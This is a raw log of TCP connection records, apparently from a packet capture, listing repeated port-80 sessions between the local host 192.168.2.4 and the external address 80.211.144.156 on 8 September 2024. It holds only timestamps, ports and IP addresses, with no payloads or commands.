                                                          Sep 8, 2024 11:54:39.066155910 CEST806488180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:39.066211939 CEST6488180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:39.066310883 CEST6488180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:39.071589947 CEST806488180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:39.418409109 CEST6488180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:39.423371077 CEST806488180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:39.423384905 CEST806488180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:39.423393011 CEST806488180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:39.730046988 CEST806488180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:39.790786028 CEST6488180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:39.860603094 CEST806488180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:39.977046967 CEST6488180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:39.977510929 CEST6488280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:39.982327938 CEST806488280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:39.982372046 CEST806488180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:39.982469082 CEST6488180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:39.982554913 CEST6488280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:39.982716084 CEST6488280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:39.987447977 CEST806488280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:40.338416100 CEST6488280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:40.343558073 CEST806488280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:40.343571901 CEST806488280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:40.343576908 CEST806488280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:40.646539927 CEST806488280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:40.773055077 CEST6488280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:40.777205944 CEST806488280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:40.882463932 CEST6488280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:40.902322054 CEST6488280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:40.903558016 CEST6488380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:40.907473087 CEST806488280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:40.907520056 CEST6488280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:40.908453941 CEST806488380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:40.908565998 CEST6488380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:40.908660889 CEST6488380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:40.913705111 CEST806488380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:41.259780884 CEST6488380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:41.264813900 CEST806488380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:41.264836073 CEST806488380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:41.264846087 CEST806488380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:41.596012115 CEST806488380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:41.650404930 CEST6488380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:41.803792000 CEST806488380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:41.853282928 CEST6488380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:41.925760984 CEST6488080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:41.929398060 CEST6488380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:41.929399967 CEST6488480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:41.934338093 CEST806488480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:41.934537888 CEST6488480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:41.934592962 CEST806488380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:41.934617043 CEST6488480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:41.934683084 CEST6488380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:41.939371109 CEST806488480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:42.290895939 CEST6488480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:42.296987057 CEST806488480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:42.296997070 CEST806488480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:42.297008038 CEST806488480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:42.609850883 CEST806488480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:42.718698025 CEST6488480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:42.815144062 CEST806488480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:42.854625940 CEST6488480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:42.855593920 CEST6488580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:42.859980106 CEST806488480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:42.860025883 CEST6488480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:42.860419035 CEST806488580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:42.860469103 CEST6488580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:42.860663891 CEST6488580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:42.865397930 CEST806488580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:42.934381008 CEST6488580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:42.935439110 CEST6488680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:42.940306902 CEST806488680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:42.940376997 CEST6488680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:42.940530062 CEST6488680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:42.945342064 CEST806488680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:42.981863022 CEST806488580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:43.291191101 CEST6488680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:43.302958965 CEST806488680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:43.302994013 CEST806488680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:43.303006887 CEST806488680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:43.333672047 CEST806488580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:43.333734989 CEST6488580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:43.604634047 CEST806488680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:43.652415037 CEST6488680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:43.812329054 CEST806488680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:43.854402065 CEST6488680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:43.930397034 CEST6488780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:43.930401087 CEST6488680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:43.935359001 CEST806488780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:43.935714960 CEST806488680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:43.935810089 CEST6488780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:43.935811043 CEST6488680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:43.935970068 CEST6488780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:43.940774918 CEST806488780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:44.291255951 CEST6488780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:44.296422958 CEST806488780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:44.296433926 CEST806488780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:44.296439886 CEST806488780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:44.603147984 CEST806488780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:44.736557961 CEST806488780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:44.736643076 CEST6488780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:44.738400936 CEST6488780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:44.743504047 CEST806488780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:44.743572950 CEST6488780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:44.868187904 CEST6488880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:44.873173952 CEST806488880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:44.873260021 CEST6488880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:44.873352051 CEST6488880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:44.878144026 CEST806488880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:45.228377104 CEST6488880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:45.233428001 CEST806488880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:45.233441114 CEST806488880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:45.233449936 CEST806488880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:45.538328886 CEST806488880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:45.587678909 CEST6488880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:45.743745089 CEST806488880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:45.790911913 CEST6488880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:45.865578890 CEST6488880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:45.865972042 CEST6488980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:45.871370077 CEST806488880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:45.871495962 CEST806488980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:45.871586084 CEST6488980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:45.871586084 CEST6488880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:45.871745110 CEST6488980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:45.878910065 CEST806488980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:46.228411913 CEST6488980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:46.235574961 CEST806488980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:46.235583067 CEST806488980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:46.235594988 CEST806488980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:46.559587955 CEST806488980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:46.678894043 CEST6488980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:46.769001961 CEST806488980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:46.901729107 CEST6488980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:46.902682066 CEST6489080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:46.907083988 CEST806488980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:46.907125950 CEST6488980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:46.907504082 CEST806489080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:46.907551050 CEST6489080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:46.907682896 CEST6489080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:46.912472963 CEST806489080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:47.259658098 CEST6489080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:47.264806986 CEST806489080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:47.264811993 CEST806489080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:47.264817953 CEST806489080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:47.579184055 CEST806489080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:47.784918070 CEST806489080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:47.788177013 CEST6489080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:47.911406040 CEST6489080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:47.914401054 CEST6489180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:47.918596983 CEST806489080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:47.919349909 CEST6489080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:47.920979023 CEST806489180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:47.922498941 CEST6489180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:47.922682047 CEST6489180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:47.927531958 CEST806489180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:47.950407028 CEST6489180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:47.950418949 CEST6489280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:47.956044912 CEST806489280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:47.958502054 CEST6489280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:47.958627939 CEST6489280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:47.963397980 CEST806489280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:48.001790047 CEST806489180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:48.069371939 CEST6489380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:48.074721098 CEST806489380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:48.074911118 CEST6489380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:48.075059891 CEST6489380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:48.079926968 CEST806489380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:48.306668043 CEST6489280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:48.311590910 CEST806489280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:48.311645985 CEST806489280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:48.389255047 CEST806489180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:48.390429974 CEST6489180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:48.431658030 CEST6489380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:48.437067986 CEST806489380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:48.437072992 CEST806489380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:48.437092066 CEST806489380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:48.627935886 CEST806489280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:48.681431055 CEST6489280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:48.741863012 CEST806489380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:48.759077072 CEST806489280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:48.790781021 CEST6489380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:48.806449890 CEST6489280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:48.945931911 CEST806489380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:48.993904114 CEST6489380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:49.078476906 CEST6489280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:49.078550100 CEST6489380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:49.079335928 CEST6489480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:49.083863020 CEST806489280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:49.083879948 CEST806489380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:49.083901882 CEST6489280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:49.083928108 CEST6489380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:49.084088087 CEST806489480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:49.084136009 CEST6489480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:49.084237099 CEST6489480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:49.088983059 CEST806489480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:49.434407949 CEST6489480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:49.439472914 CEST806489480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:49.439498901 CEST806489480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:49.439510107 CEST806489480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:49.758896112 CEST806489480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:49.806442022 CEST6489480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:49.966924906 CEST806489480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:50.026403904 CEST6489480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:50.083955050 CEST6489480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:50.086432934 CEST6489580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:50.091195107 CEST806489480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:50.091711998 CEST6489480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:50.091780901 CEST806489580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:50.091872931 CEST6489580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:50.094409943 CEST6489580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:50.101397991 CEST806489580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:50.447940111 CEST6489580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:50.453095913 CEST806489580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:50.453107119 CEST806489580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:50.453113079 CEST806489580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:50.768203974 CEST806489580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:50.822067022 CEST6489580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:50.898365974 CEST806489580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:50.939188004 CEST6489580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:51.024786949 CEST6489580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:51.025629997 CEST6489680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:51.030067921 CEST806489580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:51.030152082 CEST6489580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:51.030580044 CEST806489680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:51.030647039 CEST6489680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:51.030769110 CEST6489680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:51.036885023 CEST806489680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:51.384766102 CEST6489680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:51.390208960 CEST806489680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:51.390229940 CEST806489680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:51.390252113 CEST806489680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:51.720050097 CEST806489680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:51.775198936 CEST6489680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:51.923425913 CEST806489680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:51.978404045 CEST6489680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:52.038103104 CEST6489680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:52.038110971 CEST6489780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:52.043397903 CEST806489780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:52.043514013 CEST6489780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:52.043622017 CEST6489780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:52.044028044 CEST806489680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:52.044212103 CEST6489680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:52.048428059 CEST806489780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:52.400332928 CEST6489780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:52.407682896 CEST806489780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:52.407742023 CEST806489780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:52.407746077 CEST806489780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:52.718575001 CEST806489780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:52.759558916 CEST6489780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:52.850573063 CEST806489780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:52.900177956 CEST6489780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:52.992373943 CEST6489780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:52.993633986 CEST6489880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:52.997802019 CEST806489780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:52.997845888 CEST6489780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:52.998413086 CEST806489880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:52.998471975 CEST6489880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:52.998589993 CEST6489880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:53.003456116 CEST806489880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:53.353436947 CEST6489880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:53.358539104 CEST806489880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:53.358553886 CEST806489880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:53.358565092 CEST806489880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:53.670458078 CEST806489880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:53.729058981 CEST6489880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:53.776495934 CEST6489880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:53.776496887 CEST6489980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:53.781702042 CEST806489980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:53.782116890 CEST806489880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:53.782274961 CEST6489880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:53.782387972 CEST6489980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:53.782387972 CEST6489980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:53.787300110 CEST806489980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:53.902509928 CEST6490080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:53.907493114 CEST806490080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:53.907622099 CEST6490080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:53.907763004 CEST6490080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:53.912517071 CEST806490080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:54.134759903 CEST6489980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:54.139900923 CEST806489980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:54.139910936 CEST806489980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:54.262428999 CEST6490080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:54.267437935 CEST806490080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:54.267446041 CEST806490080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:54.267457008 CEST806490080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:54.469984055 CEST806489980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:54.525192976 CEST6489980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:54.590313911 CEST806489980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:54.595340967 CEST806490080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:54.634553909 CEST6489980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:54.634679079 CEST6490080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:54.732928038 CEST806490080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:54.775180101 CEST6490080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:54.854367018 CEST6489980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:54.854563951 CEST6490080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:54.855612993 CEST6490180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:54.860148907 CEST806489980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:54.860203981 CEST806490080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:54.860203028 CEST6489980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:54.860244989 CEST6490080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:54.860804081 CEST806490180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:54.860869884 CEST6490180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:54.861001015 CEST6490180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:54.866170883 CEST806490180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:55.212968111 CEST6490180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:55.217956066 CEST806490180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:55.217971087 CEST806490180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:55.217982054 CEST806490180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:55.527285099 CEST806490180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:55.572074890 CEST6490180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:55.732988119 CEST806490180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:55.734411001 CEST6490180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:55.740231037 CEST806490180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:55.740345001 CEST6490180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:55.850409031 CEST6490280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:55.861402988 CEST806490280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:55.866020918 CEST6490280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:55.869415045 CEST6490280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:55.874258995 CEST806490280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:56.214421988 CEST6490280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:56.219608068 CEST806490280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:56.219630003 CEST806490280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:56.219641924 CEST806490280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:56.549860954 CEST806490280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:56.603316069 CEST6490280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:56.752377033 CEST806490280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:56.806446075 CEST6490280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:56.890141010 CEST6490280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:56.891249895 CEST6490380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:56.895859957 CEST806490280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:56.895908117 CEST6490280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:56.896198034 CEST806490380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:56.896260023 CEST6490380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:56.896408081 CEST6490380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:56.901514053 CEST806490380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:57.244137049 CEST6490380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:57.249548912 CEST806490380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:57.249564886 CEST806490380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:57.249576092 CEST806490380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:57.559900999 CEST806490380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:57.603667974 CEST6490380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:57.693068981 CEST806490380.211.144.156192.168.2.4
